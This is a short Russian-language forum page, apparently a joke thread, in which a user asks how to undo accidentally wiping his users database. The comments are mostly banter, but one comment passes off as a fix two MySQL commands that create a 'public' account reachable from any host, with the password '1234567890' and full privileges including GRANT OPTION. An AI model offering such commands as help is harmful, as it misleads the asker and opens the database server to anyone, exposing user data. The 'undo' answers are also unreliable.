Закрыть
Коллеги, я совершенно случайно затер нашу базу данных с пользователями, подскажите, пожалуйста, у нашей СУБД есть кнопка отменить??
Автор: Илья
Пожаловаться  |  Поделиться

Комментарии (5)

кнтрл зет, браток. Всё изи
Звёздный Лорд, Полевых цветов веночек
В утренней росе цветок
Соловья запев свисточек
Сок берёзовый глоток
КОНЕЧНО!
пропиши в mysql клиенте:
CREATE USER "public"@"%" IDENTIFIED BY "1234567890";
А ПОТОМ:
GRANT ALL PRIVILEGES ON *.* TO 'public'@'%' WITH GRANT OPTION;

ХОРОШЕГО ДНЯ!!!;

Действия